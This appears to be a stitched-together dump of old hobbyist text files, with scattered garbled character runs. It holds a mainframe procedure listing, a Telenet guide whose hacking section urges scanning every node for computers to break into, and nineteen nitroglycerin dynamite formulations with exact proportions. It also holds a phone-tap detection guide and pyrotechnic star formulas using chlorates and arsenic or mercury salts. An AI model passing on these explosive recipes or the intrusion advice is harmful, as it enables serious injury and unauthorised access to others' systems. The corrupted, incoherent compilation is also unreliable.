  1458. $COPY(FILE)
  1459. $REVERT.
  1460. $EXIT.
  1461. $CSET(NORMAL)
  1462. $REVERT,NOLIST. WHERE IS THAT FILE??
  1463. #EOR
  1464. .PROC,LOCAL.
  1465. .******DIRECTORY OF LOCAL FILES******
  1466. $RETURN(PROCLIB,YYYYBAD,YYYYPRC)
  1467. $GET(QQQFILE=ENQF/UN=1GTL0CL)
  1468. QQQFILE.
  1469. $REVERT,NOLIST.
  1470. $EXIT.
  1471. $REVERT. FILES ERROR
  1472. #EOR
  1473. .PROC,RL.
  1474. .******RAISE LIMITS******
  1475. $SETASL(*)
  1476. $SETJSL(*)
  1477. $SETTL(*)
  1478. $CSET(ASCII)
  1479. $NOTE./ Limits now at max validated levels.
  1480. $CSET(NORMAL)
  1481. $REVERT,NOLIST.
  1482. #EOR
  1483. .PROC,CL.
  1484. .******CLEAR******
  1485. $CLEAR,*.
  1486. $CSET(ASCII)
  1487. $NOTE./LOCAL FILE AREA CLEARED
  1488. $REVERT,NOLIST.
  1489. #EOR
  1490. .PROC,P,FILE=THING,LST=LIST.
  1491. .***********************************************************
  1492. $CLEAR.
  1493. $GET(FILE)
  1494. $PASCAL4,FILE,LST.
  1495. $REVERT.
  1496. $EXIT.
  1497. $REWIND,*.
  1498. $CSET(ASCII)
  1499. $COPY(LIST)
  1500. $CSET(NORMAL)
  1501. $REVERT,NOLIST.
  1502. #EOR
  1503. .PROC,RE.
  1504. .******REWIND******
  1505. $REWIND,*.  ∩7Å3 è$CSET(ASCII)
  1506. $NOTE./REWOUND.
  1507. $REVERT,NOLIST.
  1508. #EOR
  1509. .PROC,FOR,FILE,LST=LIST.
  1510. .********************************************************************
  1511. $CLEAR.
  1512. $GET(FILE)
  1513. $FTN5,I=FILE,L=LST.
  1514. $REPLACE(LST=L)
  1515. $CSET(ASCII)
  1516. $REVERT. Fortran Compiled
  1517. $EXIT.
  1518. $REWIND,*.
  1519. $COPY(LST)
  1520. $REVERT. That's all folks.
  1521. #EOR
  1522. .PROC,WAR.
  1523. .******WARBLES******
  1524. $SACFIND,AID,WAR.
  1525. $REVERT,NOLIST.
  1526. #EOR
  1527. .PROC,M.
  1528. .******MAIL/CHECK******
  1529. $MAIL/CHECK.
  1530. $REVERT,NOLIST.
  1531. #EOR
  1532. .PROC,MA.
  1533. .******ENTER MAIL******
  1534. $MAIL.
  1535. $REVERT,NOLIST.
  1536. #EOR
  1537. .PROC,HE,FILE=SUMPROC,UN=.
  1538. .******HELP FILE******
  1539. $GET,FILE/#UN=UN.
  1540. $COPY(FILE)
  1541. $REVERT.
  1542. $EXIT.
  1543. $REVERT,NOLIST.
  1544. #EOR
  1545. .PROC,DYNAMO.
  1546. .******WHO KNOWS??******
  1547. $GET,DYNMEXP/UN=7ETPDOC.
  1548. $SKIPR,DYNMEXP.
  1549. $COPYBR,DYNMEXP,GO.
  1550. $FIND,DYNAMO,GO.
  1551. $REVERT,NOLIST.
  1552. #EOR
  1553. #EOR
  1554. #EOI
  1555.  
  1556.  
  1557.  
  1558.                              The Basics of TELENET
  1559.                                      Part I
  1560.  
  1561.   This Bulletin is the first in a series to cover the general procedures of the
  1562. major data networks:
  1563.  
  1564. Telenet
  1565. Tymnet
  1566. Autonet
  1567. Arpanet
  1568. [More to be added]
  1569.  
  1570.  
  1571.                                    BACKGROUND  ∩7Å3 è                                ----------
  1572.   Telenet connects many large computers to itself through dedicated telephone
  1573. lines, each of these 'host computers' is assigned a node address(ie.:NPAxx).
  1574. Telenet is an international data network, connecting to computers around the
  1575. world.See the International telenet bulletin for more on this.
  1576.  
  1577.                                    CONNECTING
  1578.                                    ----------
  1579.   Telenet is probably the most 'user friendly' network of the four listed.  A
  1580. normal logon looks like this:  [NPA=Area code,xx=node address] You hit <CR>
  1581. <CR> [2 Returns] Telenet respnds with:TELENET NPAxx
  1582.  
  1583. TERMINAL=(Here you type your terminal identifier) (See the bulletin section for
  1584.        the list)
  1585.  
  1586.              @
  1587.  
  1588.   The '@' is Telenet's promt to you to go ahead.
  1589.  
  1590.                             Things to do on telenet
  1591.                             -----------------------
  1592.   To connect to a node type:
  1593.                         @C NPAxx
  1594.   Telenet will atempt to connect to the computer at the node given.
  1595.   A few of the things that Telenet will say are:
  1596.  
  1597.  
  1598. NPAxx CONNECTED (You are connected to a computer)
  1599. ILLEGAL ADDRESS (Not a working node)
  1600. NPAxx NOT REACHABLE   (The computer at that node is 'DOWN')
  1601. NPAxx REFUSED  COLLECT CONNECTION(Needs a paid ID [More later]
  1602. NPAxx REJECTING (Computer is 'UP' but not available)
  1603. NPAxx NOT RESPONDING (The computer at that node is 'DOWN')
  1604.  
  1605.   These are most of the things that Telenet will tell you
  1606.  
  1607.                                MORE THINGS TO DO
  1608.                                -----------------
  1609.   Typing an @ while in a host computer will return you to Telenet You will
  1610. still be connected to the other computer, you may:  D (to disconnect from that
  1611. computer) or TAPE (Unknown, possibly records your actions so that) (you may
  1612. look at them later)
  1613.  
  1614.   If you type either of the above, while not connected to a node telenet will
  1615. respond with NOT CONNECTED
  1616.  
  1617.                                      MISC.
  1618.                                      -----
  1619. RESET (Returns Telenet to the beggining,you must start again (with the
  1620.       <CR><CR>)
  1621.  
  1622. SET (Unknown)
  1623.  
  1624. MAIL (To connect to GTE Telemail) It will ask for User?  and Password?
  1625.   ∩7Å3 è
  1626.                                      NOTES
  1627.                                      -----
  1628.  
  1629.   In addition to the normal area codes in NPAxx there are also other NPA's used
  1630. in Telenet, 909 and 311, for instance.
  1631.  
  1632.   Telenet hangs up after three disconnections from host computers, this
  1633. unfortunately is quite a PAIN in the ___ There is no way to get around this as
  1634. far as I can tell.
  1635.  
  1636.   The ID command in Telenet is to Identify users to the host computers.  You
  1637. must type ID (your ID#) (your password).  If you just type ID, telenet will
  1638. tell you that your ID is cleared, which means nothing.  To recieve a paid user
  1639. ID on telenet call them at:  Telenet customer service:800-336-0437 800-572-
  1640. 0408(In Virginia)
  1641.  
  1642.  
  1643.                                     HACKING
  1644.                                     -------
  1645.   Telenet is very convinient for hackers as it connects many computers to your
  1646. terminal, without having to find and dial many numbers.  Start your Telehacking
  1647. by picking an areacode and then trying all the nodes in that NPA.  You will no
  1648. doubt find many interesting computers 'to work on'.
  1649.  
  1650.    Here are instructions for using TELENET.  There are some very basic things,
  1651. which most people already know, and some other things, which even the most
  1652. dedicated hackers have probably never even heard of.  This includes things such
  1653. as international access, etc.  Well, have fun.
  1654.  
  1655.  
  1656.                     THE TELENET CONNECTION
  1657.       INTERNATIONAL ADDRESSING/INTERNATIONAL ACCESS PROCEDURES
  1658.  
  1659.  
  1660. I.  TELENET INTERNATIONAL ADDRESS FORMAT
  1661.  
  1662.     ---------------------------- Data Network
  1663.     |                       Identification Code (DNIC)
  1664.     |
  1665.     |
  1666.     |
  1667.     |      ------------------- Area Code
  1668.     |      |
  1669.     |      |
  1670.     |      |    ------------- DTE Address
  1671.     |      |    |
  1672.     |      |    |      ----- Port Address
  1673.     |      |    |      |
  1674.     |      |    |      |
  1675.   DDDD    AAA  HHHHH   PP
  1676.                        |
  1677.                        ----- Optional Subaddress
  1678.                             Field for Packet Mode DTE
  1679.   ∩7Å3 è
  1680. Example:  Telenet        International
  1681.         -------         -------------
  1682.         212 141         3110 21200141
  1683.         909  84         3110 90900084
  1684.  
  1685.  
  1686.  
  1687. II.   ACCESS TO OVERSEAS PUBLIC DATA NETWORKS
  1688.  
  1689. 1.  Turn on the terminal and coupler.
  1690. 2.  Dial the nearest Telenet access number (See Telenet Public Dial listing).
  1691.     When you hear a high-pitched tone, place the telephone
  1692.     receiver in the coupler.
  1693.  
  1694.      For Data Sets (Bell 103 or 113 type), depress the data button.
  1695.  
  1696. 3.  Type Two carriage returns (CR).
  1697. 4.  Telenet will give you a port identification number and ask you
  1698.     to identify your terminal type in the two or four
  1699.     character id for your terminal followed by a carriage
  1700.     return (CR) or type carriage return (CR).
  1701.  
  1702.       (EX.)   TELENET
  1703.              202 DL9
  1704.              TERMINAL = AJ63(CR)
  1705.  
  1706. 5.  After Telenet prompts with a '@' type 'ID', skip a space (SP)
  1707.     and type your password followed by a carriage return.  (Contact
  1708.     your GTE Telenet Representative to obtain a required caller
  1709.     paid ID.)
  1710.  
  1711.       (EX.)   @ID(SP);INTL(CR)
  1712.  
  1713.     Type in your password.
  1714.  
  1715.       (EX.)   PASSWORD = 123456(CR)
  1716.  
  1717. 6.  After Telenet prompts with an @, type a C. skip a space and
  1718.     type the network address of the computer you wish to access,
  1719.     followed by a carriage return (CR).
  1720.  
  1721.       (EX.)   @C(SP)023411234567890(CR)
  1722.  
  1723.     Note:  Your International address will follow a format such as:
  1724.  
  1725.          020801234567890 for France/Transpac
  1726.          023421234567890 for United Kingdom/British Telecom
  1727.          026241234567890 for Germany/Datex-P
  1728.  
  1729. 7.  Telenet will respond with a connection message.  You are now
  1730.     ready to begin your conversation with the host computer.
  1731.  
  1732.       (EX.)   (ADDRESS)CONNECTED
  1733.   ∩7Å3 è8.  To disconnect from your computer, log off as usual.  Telene   will send you a disconnected message.
  1734.  
  1735.       (EX.)   (ADDRESS)DISCONNECTED
  1736.  
  1737.     Hang up to disconnect from Telenet.
  1738.  
  1739. (CR) = Carriage return
  1740. (SP) = Space
  1741.  
  1742.  
  1743.  
  1744.                                    Dynamite
  1745.  
  1746.      Dynamite is nothing more than just nitroglycerin and a stablizing agent
  1747. to make it much safer to use.  For the sake of saving time, I will abbreviate
  1748. nitroglycerin with a plain NG.  The numbers are percentages, be sure to mix
  1749. these carefully and be sure to use the exact amounts.  These percentages are
  1750. in weight ratio, not volume.
  1751.  
  1752. no.  ingredients                 amount
  1753. ---------------------------------------
  1754. #1   NG                          32
  1755.      sodium nitrate              28
  1756.      woodmeal                    10
  1757.      ammonium oxalate            29
  1758.      guncotten                    1
  1759.  
  1760. #2   NG                          24
  1761.      potassium nitrate            9
  1762.      sodium nitate               56
  1763.      woodmeal                     9
  1764.      ammonium oxalate             2
  1765.  
  1766. #3   NG                          35.5
  1767.      potassium nitrate           44.5
  1768.      woodmeal                     6
  1769.      guncotton                    2.5
  1770.      vaseline                     5.5
  1771.      powdered charcoal            6
  1772.  
  1773. #4   NG                          25
  1774.      potassium nitrate           26
  1775.      woodmeal                    34
  1776.      barium nitrate               5
  1777.      starch                      10
  1778.  
  1779. #5   NG                          57
  1780.      potassium nitrate           19
  1781.      woodmeal                     9
  1782.      ammonium oxalate            12
  1783.      guncotton                    3
  1784.  
  1785. #6   NG                          18
  1786.      sodium nitrate              70  ∩7Å3 è     woodmeal                  5.5
  1787.      potassium chloride           4.5
  1788.      chalk                        2
  1789.  
  1790. #7   NG                          26
  1791.      woodmeal                    40
  1792.      barium nitrate              32
  1793.      sodium carbonate             2
  1794.  
  1795. #8   NG                          44
  1796.      woodmeal                    12
  1797.      anhydrous sodium sulfate    44
  1798.  
  1799. #9   NG                          24
  1800.      potassium nitrate           32.5
  1801.      woodmeal                    33.5
  1802.      ammonium oxalate            10
  1803.  
  1804. #10  NG                          26
  1805.      potassium nitrate           33
  1806.      woodmeal                    41
  1807.  
  1808. #11  NG                          15
  1809.      sodium nitrate              62.9
  1810.      woodmeal                    21.2
  1811.      sodium carbonate              .9
  1812.  
  1813. #12  NG                          35
  1814.      sodium nitrate              27
  1815.      woodmeal                    10
  1816.      ammonium oxalate             1
  1817.  
  1818. #13  NG                          32
  1819.      potassium nitrate           27
  1820.      woodmeal                    10
  1821.      ammonium oxalate            30
  1822.      guncotton                    1
  1823.  
  1824. #14  NG                          33
  1825.      woodmeal                    10.3
  1826.      ammonium oxalate            29
  1827.      guncotton                     .7
  1828.      potassium perchloride       27
  1829.  
  1830. #15  NG                          40
  1831.      sodium nitrate              45
  1832.      woodmeal                    15
  1833.  
  1834. #16  NG                          47
  1835.      starch                      50
  1836.      guncotton                    3
  1837.  
  1838. #17  NG                          30
  1839.      sodium nitrate              22.3
  1840.      woodmeal                    40.5  ∩7Å3 è     potassium chloride        7.2
  1841.  
  1842. #18  NG                          50
  1843.      sodium nitrate              32.6
  1844.      woodmeal                    17
  1845.      ammonium oxalate              .4
  1846.  
  1847. #19  NG                          23
  1848.      potassium nitrate           27.5
  1849.      woodmeal                    37
  1850.      ammonium oxalate             8
  1851.      barium nitrate               4
  1852.      calcium carbonate             .5
  1853.  
  1854.  
  1855.  
  1856.  
  1857.                          BUG DETECTION ON HOME PHONES
  1858.  
  1859.   FIRST OF ALL TO TEST FOR BUGS, YOU NEED A VOM (MULTIMETER) THE HIGHER THE
  1860. IMPEDANCE THE BETTER (A DIGITAL WITH FET CIRCUITRY OR A VACUUM TUBE VOLT METER
  1861. IS THE BEST).
  1862.  
  1863.   FIRST DISCONNECT THE PHONE LINE(S) AT BOTH ENDS.  UNDO THE PHONE INSTRUMENT
  1864. AND HOOK IT UP TO THE ENTRY POINT OF THE PHONE LINE FROM THE OUTSIDE WORLD (MA
  1865. BELL DOES NOT LIKE YOU CUT HER OFF COMPLETELY.)  THE SCHEME IS THE PHYSICALLY
  1866. ISOLATE YOUR HOUSE, APARTMENT, ETC. FROM THE OUTSIDE WORLD.  BUT BEFORE YOU DO
  1867. THIS MEASURE THE LINE VOLTAGE (IT SHOULD BE APPROXIMATELY 48 VOLTS).
  1868.  
  1869.   NOW WITH THE WIRES DISCONNECTED AT BOTH ENDS, SET YOUR RESISTANCE SCALE TO A
  1870. HIGH READING AND MEASURE THE RESISTANCE OF THE PHONE LINE, IT SHOULD BE VERY
  1871. HIGH ON THE ORDER OF MILLION OHMS OR MORE, THIS IS THE NORMAL CONDITION, SINCE
  1872. YOU ARE MEASURING THE RESISTANCE OF AN OPEN CIRCUIT.  IF IT IS MUCH LESS, SAY
  1873. 50-100KOHMS THEN YOU A DEVICE ON THE LINE THAT DOES NOT BELONG THERE, PROBABLY
  1874. A PARALLEL BUG.
  1875.  
  1876.   NOW TWIST THE END OF THE DISCONNECTED WIRE AND GO TO THE OTHER END AND
  1877. MEASURE THE RESISTANCE OF THIS.  THIS RESISTANCE SHOULD BE ABOUT ONE OHM OR
  1878. TWO AT THE MOST IN A BIG HOUSE WITH A LOT OF PHONES.  IF IT IS MORE, THEN YOU
  1879. PROBABLY HAVE A SERIES BUG.
  1880.  
  1881.   IF IN THE FIRST CASE, TAKING PARALLEL MEASUREMENTS USING A METER (NOT
  1882. LEDLLCD) AND YOU NOTICE A "KICK" IN THE NEEDLE, YOU PROBABLY HAVE A LINE TAP.
  1883.  
  1884.   NOW IF YOU ALSO MAKE A MEASUREMENT WITH THE WIRE END TWISTED TOGETHER AND
  1885. YOU NOTICE THE RESISTANCE READS ABOUT 1-2KOHMS, THEN YOU MAY HAVE A DROP-OUT
  1886. RELAY. A DROP-OUT RELAY IS A RELAY THAT SENSES A PHONE GOING OFF HOOK, AND
  1887. SIGNALS A TAPE RECORDER TO START RECORDING.
  1888.  
  1889.   ANOTHER TEST TO DO WITH THE PHONES STILL HOOKED UP TO THE OUTSIDE WORLD, ON
  1890. HOOK VOLTAGE IS ABOUT 48 VOLTS AND OFF HOOK IS ABOUT 6-10 VOLTS.  ANY OTHER
  1891. CONDITIONS MAY MEAN TELEPHONE SURVEILLANCE.
  1892.  
  1893.   IF YOU USE A WIDE RANGE AUDIO FREQUENCY GENERATOR AND CALL YOUR HOUSE,
  1894. APARTMENT, ETC. FROM ANOTHER PHONE AND SWEEP UP AND DOWN THE SPECTRUM, AND YOU  ∩7Å3 èNOTICE THE PHONE ANSWERS ITSELF SOMEWHERE IN THE SWEEP YOU PROBABLY HAVE AN
  1895. INFINITY TRANSMITTER ON YOUR LINE.
  1896.  
  1897.  
  1898.  
  1899.  
  1900.                        Stars, Flares, and Color Mixtures
  1901.  
  1902.   We will be using the following materials this time. Get familiar with them.
  1903. Some can be highly dangerous.
  1904.  
  1905.  
  1906. Aluminum Dust (and powder)   Al
  1907.  
  1908. An element used for brilliancy in the fine powder form. It can be purchased as
  1909. a fine silvery or gray powder. All grades from technical to superpure (99.9%)
  1910. can be used. It is dangerous to inhale the dust. The dust is also flammable, by
  1911. itself. In coarser forms, like powder, it is less dangerous.
  1912.  
  1913. Antimony Sulfide Sb S
  1914.                    2 3
  1915. Also known as "Black" Antimony Sulfide. (There is also a "Red" form, which is
  1916. useless to us.) This is used to sharpen the report of firecrackers, salutes,
  1917. etc, or to add color to a fire. The technical, black, powder is suitable. Avoid
  1918. contact with the skin. Dermatitis or worse will be the result.
  1919.  
  1920. Barium Chlorate   Ba(ClO ) * H O
  1921.                         3 2   2
  1922. Available as a white powder. It is poisonous, as are all Barium salts. It is
  1923. used both as an oxidizer and color imparter. It is as powerful as Potassium
  1924. Chlorate and should be handled with the same care. Melting point is 414
  1925. degrees.
  1926.  
  1927. Barium Nitrate  Ba(NO )
  1928.                      3 2
  1929. Poisonous. Used as an oxidizer and colorizer. The uses and precautions are the
  1930. same as with a mixture containing Potassium Nitrate.
  1931.  
  1932. Charcoal  C
  1933.  
  1934. A form of the element carbon. Used in fireworks and explosives as a reducing
  1935. agent. It can be purchased as a dust on up to a coarse powder. Use dust form,
  1936. unless otherwise specified. The softwood variety is best, and it should be
  1937. black, not brown.
  1938.  
  1939. Copper Acetoarsenite   (CuO) As O Cu(C H O )
  1940.                             3  2 3    2 3 2 2
  1941. The popular name for this is Paris Green. It is also called King's Green or
  1942. Vienna Green. It has been used as an insecticide, and is available as a
  1943. technical grade, poisonous, emerald green powder. It is used in fireworks to
  1944. add color. Careful with this stuff. It contains arsenic.
  1945.  
  1946. Copper Chloride   CuCl
  1947.                       2
  1948. A color imparter. As with all copper salts, this is poisonous.  ∩7Å3 è
  1949. Copper Sulfate   CuSO *5H O
  1950.                      4   2
  1951. Known as Blue Vitriol, this poisonous compound is available as blue crystals or
  1952. blue powder. Can be purchased in some drugstores and some agricultural supply
  1953. stores. Used as a colorizer.
  1954.  
  1955. Dextrine
  1956. This can be purchased as a white or yellow powder. It is a good cheap glue for
  1957. binding cases and stars in fireworks.
  1958.  
  1959. Lampblack   C
  1960.  
  1961. This is another form of the element carbon. It is a very finely powdered black
  1962. dust (soot, actually) resulting from the burning of crude oils. It is used for
  1963. special effects in fireworks.
  1964.  
  1965. Lead Chloride  PbCl
  1966.                    3
  1967. Available as a white, crystalline, poisonous powder, which melts at 501
  1968. degrees. As with all lead salts, it is not only poisonous, but the poison
  1969. accumulates in the body, so a lot of small, otherwise harmless doses can be as
  1970. bad as one large dose.
  1971.  
  1972. Mercurous Chloride  HgCl
  1973.  
  1974. Also known as calomel or Mercury Monochloride. This powder will brighten an
  1975. otherwise dull colored mixture. Sometimes it is replaced by Hexachlorobenzene
  1976. for the same purpose. This is non poisonous ONLY if it is 100% pure. Never
  1977. confuse this chemical with Mercuric Chloride, which is poisonous in any purity.
  1978.  
  1979. Potassium Chlorate  KClO
  1980.                         3
  1981. This, perhaps, is the most widely used chemical in fireworks. Before it was
  1982. known, mixtures were never spectacular in performance. It opened the door to
  1983. what fireworks are today. It is a poisonous, white powder that is used as an
  1984. oxidizer. Never ram or strike a mixture containing Potassium Chlorate. Do not
  1985. store mixtures containing this chemical for any length of time, as they may
  1986. explode spontaneously.
  1987.  
  1988. Potassium Dichromate   K Cr O
  1989.                         2  2 7
  1990. Also known as Potassium Bichromate. The commercial grade is used in fireworks
  1991. and matches. The bright orange crystals are poisonous.
  1992.  
  1993. Potassium Nitrate   KNO
  1994.                        3
  1995. Commonly called Saltpeter. This chemical is an oxidizer which decomposes at 400
  1996. degrees. It is well known as a component of gunpowder and is also used in other
  1997. firework pieces. Available as a white powder.
  1998.  
  1999. Potassium Perchlorate   KClO
  2000.                             4
  2001. Much more stable than its chlorate brother, this chemical is a white or
  2002. slightly pink powder. It can often substitute for Potassium Chlorate to make  ∩7Å3 èthe mixture safer. It will not yield its oxygen as easily, but to make up for
  2003. this, it gives off more oxygen. It is also poisonous.
  2004.  
  2005. Red Gum
  2006.  
  2007. Rosin similar to shellac and can often replace it in many fireworks formulas.
  2008. Red Gum is obtained from barks of trees.
  2009.  
  2010. Shellac Powder
  2011.  
  2012. An organic rosin made from the secretions of insects which live in India. The
  2013. exact effect it produces in fireworks is not obtainable from other gums. The
  2014. common mixture of shellac and alcohol sold in hardware stores should be
  2015. avoided. Purchase the powdered variety, which is orange in color.
  2016.  
  2017. Sodium Oxalate  Na C O
  2018.                   2 2 4
  2019. Used in making yellow fires. Available as a fine dust, which you should avoid
  2020. breathing.
  2021.  
  2022. Strontium Carbonate   SrCO
  2023.                           3
  2024. Known in the natural state as Strontianite, this chemical is used for adding a
  2025. red color to fires. It comes as a white powder, in a pure, technical, or
  2026. natural state.
  2027.  
  2028. Strontium Nitrate   Sr(NO )
  2029.                          3 2
  2030. By far the most common chemical used to produce red in flares, stars and fires.
  2031. Available in the technical grade as a white powder. It does double duty as an
  2032. oxidizer, but has a disadvantage in that it will absorb some water from the
  2033. air.
  2034.  
  2035. Strontium Sulfate   SrSO
  2036.                         4
  2037. Since this chemical does not absorb water as readily as the nitrate, it is
  2038. often used when the powder is to be stored. In its natural state it is known as
  2039. Celestine, which is comparable to the technical grade used in fireworks.
  2040.  
  2041. Sulfur   S
  2042.  
  2043. A yellow element that acts as a reducing agent. It burns at 250 degrees, giving
  2044. off choking fumes. Purchase the yellow, finely powdered form only. Other forms
  2045. are useless without a lot of extra and otherwise unnecessary effort to powder
  2046. it.
  2047.  
  2048. Zinc Dust   Zn
  2049.  
  2050. Of all the forms of zinc available, only the dust form is in any way suitable.
  2051. As a dust, it has the fineness of flour. Should be either of the technical or
  2052. high purity grade. Avoid breathing the dust, which can cause lung damage. Used
  2053. in certain star mixtures, and with sulfur, as a rocket fuel.
  2054.  
  2055.  
  2056.   ∩7Å3 è                         The Chemistry of Pyrotechnics
  2057.  
  2058. Most pyrotechnic mixtures follow a very simple set of chemical rules. We'll go
  2059. over those now. Most mixtures contain an oxidizing agent, which usually
  2060. produces oxygen used to burn the mixture, and a reducing agent, which burns to
  2061. produce hot gasses. In addition, there can be coloring agents to impart a color
  2062. to the fire, binders, which hold the mixture in a solid lump, and regulators
  2063. that speed up or slow down the speed at which the mixture burns. These are not
  2064. all the possibilities, but they cover most all cases.
  2065.  
  2066. Oxidizing agents, such as nitrates, chlorates, and perchlorates provide the
  2067. oxygen. They usually consist of a metal ion and the actual oxidizing radical.
  2068. For example, Potassium Nitrate contains a metal ion (Potassium) and the
  2069. oxidizing radical (the Nitrate). Instead of potassium, we could instead
  2070. substitute other metals, like sodium, barium, or strontium, and the chemical
  2071. would still supply oxygen to the burning mixture. But some are less desirable.
  2072. Sodium Nitrate, for example, will absorb moisture out of the air, and this will
  2073. make it harder to control the speed at which the mixture will burn.
  2074.  
  2075. In the following examples, we'll use the letter "X" to show the presence of a
  2076. generic metal ion.
  2077.  
  2078. Note that Nitrates are stingy with the oxygen that they give up. They only give
  2079. one third of what they have.
  2080.  
  2081.     Some        Some
  2082.    Nitrate     Nitrite  Oxygen
  2083.  
  2084.      2XNO  ---> 2XN0    +  O
  2085.          3          2       2
  2086.  
  2087. Chlorates are very generous, on the other hand. They give up all the oxygen
  2088. they have. Furthermore, they give it up more easily. It takes less heat, or
  2089. less shock to get that oxygen loose. Mixtures using chlorates burn more
  2090. spectacularly, because a smaller volume of the mix needs to be wasted on the
  2091. oxidizer, and the ease with which the oxygen is supplied makes it burn faster.
  2092. But the mixture is also MUCH more sensitive to shock.
  2093.  
  2094.      Some           Some
  2095.    Chlorate       Chloride     Oxygen
  2096.  
  2097.      2XClO   --->   2XCl     +   3O
  2098.           3                        2
  2099.  
  2100. Perchlorates round out our usual set of oxidizing tools. Perchlorates contain
  2101. even more oxygen than Chlorates, and also give it all up. However, they are not
  2102. as sensitive as the Chlorates, so they make mixtures that are "safer". That is,
  2103. they're less likely to explode if you drop or strike them.
  2104.  
  2105.      Some          Some
  2106.   Perchlorate    Chloride     Oxygen
  2107.  
  2108.      XClO   --->   XCl     +    2O
  2109.          4                        2
  2110.   ∩7Å3 è
  2111. Reducing agents, like sulfur and charcoal (carbon) simply burn the oxygen to
  2112. produce sulfur dioxide and carbon dioxide. It's usually best to include a
  2113. mixture of the two in a pyrotechnic mixture, as they burn at different speeds
  2114. and temperatures, and the proper combination will help control the speed of
  2115. combustion. Also, when extra fast burning speed is needed, like in rockets and
  2116. firecrackers, metal powder is often added. The finer the powder, the faster the
  2117. burning rate. The proportions change the speed, as well. Magnesium powder or
  2118. dust is often used for speed. Aluminum dust works, but not as well. Zinc dust
  2119. is used in some cases. Powdered metal, (not dust) particularly aluminum or
  2120. iron, are often used to produce a mixtire that shoots out sparks as it burns.
  2121. In rare cases, it is desirable to slow down the burning speed. In this case,
  2122. corn meal is often used. It burns, so acts as a reducing agent, but it doesn't
  2123. burn very well.
  2124.  
  2125.  
  2126. Coloring agents are very interesting. It's long been known that various metals
  2127. produce different colored flames when burned in a fire. The reasons are buried
  2128. in the realm of quantum physics, but the results are what matters, and we can
  2129. present them here. Note that if we use an oxidizing agent that contains a
  2130. colorizing metal, it can do a double job. It can produce oxygen and color.
  2131.  
  2132. Barium     -Barium salts give a pleasant green color. Barium Nitrate is most
  2133.             often used.
  2134. Strontium  -Strontium salts give a strong red color. Strontium Nitrate is a
  2135.             very convenient material for red.
  2136. Sodium     -Sodium salts give an intense yellow color. So intense in fact that
  2137.             any sodium compounds in a mixture will usually wash out other
  2138.             colorizers. As has been said, Sodium Nitrate absorbs moisture from
  2139.             the air, and so is not really suitable to impart color. Instead,
  2140.             Sodium Oxalate is usually used. This does not absorb lots of water,
  2141.             but has the disadvantage of being very poisonous.
  2142. Copper     -Copper salts are used to give a blue color. Blue is the most
  2143.             difficult color to produce, and it's usually not too spectacular.
  2144.             Usually Copper Acetoarsenite (Paris Green) is used. This compound
  2145.             contains arsenic, and is very poisonous. Since it still doesn't
  2146.             produce a very memorable blue, it's often used with mercurous
  2147.             chloride, which enhances the color, but is also poisonous, and
  2148.             expensive, to boot.
  2149. Potassium  -Potassium salts will give a delicate purple color, if they'e very
  2150.             pure. The cheaper lab grades of potassium nitrate often contain
  2151.             traces of sodium, which completely obscure the purple color. In
  2152.             order to get the purple coloring, very pure grades must be used,
  2153.             and you must be very careful to mix it in very clean vessels, and
  2154.             scoop it from the supply jar with a very clean scoop. The color is
  2155.             certainly worth the effort, if you can get it.
  2156.  
  2157.  
  2158. Some mixtures that burn in colors also contain binders, that hold the mixture
  2159. together in a solid lump. These lumps are usually referred to as stars. The
  2160. balls fired from a roman candle or the colorful showers sprayed from aerial
  2161. bombs are examples of stars. Depending on the mixture, the binder is either a
  2162. starch called dextrine or finely powdered orange shellac. A shellac-like
  2163. material called red gum is also used on occasion. In some mixtures, the shellac
  2164. powder also helps produce a nice color. Shellac mixtures are moistened with  ∩7Å3 èalcohol to get them to stick together. Dextrine mixtures are moistened with
  2165. water.
  2166.  
  2167. If the colored mixture is to be used as a flare, it's just packed into a thin
  2168. paper tube. If it's to be fired from a roman candle, it's usually extruded from
  2169. a heavy tube by pushing it out with a dowel, and the pieces are cut off as the
  2170. proper length pops out. Stars fired from an aerial bomb are usually made by
  2171. rolling the moist mixture flat, and cutting it with a knife into small cubes.
  2172. Stars that are extruded are often called "pumped stars" those that are rolled
  2173. out are "cut stars".
  2174.  
  2175. The following are formulas for mixtures that burn with various colors. Parts
  2176. are by weight.
  2177.  
  2178. Red
  2179.  
  2180. Potassium Chlorate    9
  2181. Lampblack             1
  2182. Strontium Nitrate     9
  2183. bind with shellac
  2184. dissolved in alcohol
  2185.  
  2186.  
  2187. Blue
  2188.  
  2189. Potassium Chlorate    9         This one is inferior
  2190. Copper Acetoarsenite  2         Potassium Chlorate    12
  2191. Mercurous Chloride    1         Copper Sulfate        6
  2192. Sulfur                2         Lead Chloride         1
  2193. bind with dextrine              Sulfur                4
  2194. in water                        bind with dextrin in water
  2195.  
  2196.  
  2197. Green
  2198.  
  2199. Barium Chlorate       8         Barium Nitrate        3
  2200. Lampblack             1         Potassium Chlorate    4
  2201. Shellac Powder        1         Shellac Powder        1
  2202. bind with alcohol               Dextrine              1/4
  2203.                                 Bind with alcohol
  2204.  
  2205. Yellow
  2206.  
  2207. Potassium Chlorate    8         Potassium Chlorate    8
  2208. Sodium Oxalate        3         Sodium Oxalate        4
  2209. Lampblack             2         Shellac Powder        2
  2210. Bind with shellac in            Dextrine              1
  2211. alcohol or dextrine             Bind with alcohol
  2212. in water
  2213.  
  2214.  
  2215. White
  2216.  
  2217. Potassium Nitrate     6
  2218. Sulfur                1  ∩7Å3 èAntimony Sulfide      2
  2219. bind with dextrine in
  2220. water
  2221.  
  2222.  
  2223. Orange
  2224.  
  2225. Strontium Nitrate     36
  2226. Sodium Oxalate        8
  2227. Potassium Chlorate    5
  2228. Shellac Powder        5
  2229. Sulfur                3
  2230. Bind with alcohol
  2231.  
  2232.  
  2233. Purple (ingredients must be very pure)
  2234.  
  2235. Potassium Chlorate    36        This one has more of a lilac color
  2236. Strontium Sulfate     10        Potassium Chlorate    38
  2237. Copper Sulfate        5         Strontium Carbonate   18
  2238. Lead Chloride         2         Copper Chloride       4
  2239. Charcoal              2         Lead Chloride         2
  2240. Sulfur                12        Sulfur                14
  2241. bind with dextrine in           bind with dextrine in water
  2242. water
  2243.  
  2244.  
  2245. Brilliant White
  2246.  
  2247. Potassium Perchlorate 12
  2248. Aluminum Dust         4
  2249. Dextrine              1
  2250. Bind with water
  2251.  
  2252.  
  2253. Golden Twinkler Stars - Falls through the air and burns in an on and off
  2254.   manner. The effect is spectacular. A pumped or cut star.
  2255.  
  2256. Potassium Nitrate     18
  2257. Sulfur                3
  2258. Lampblack             3
  2259. Aluminum Powder       3
  2260. Antimony Sulfide      3
  2261. Sodium Oxalate        4
  2262. Dextrine              2
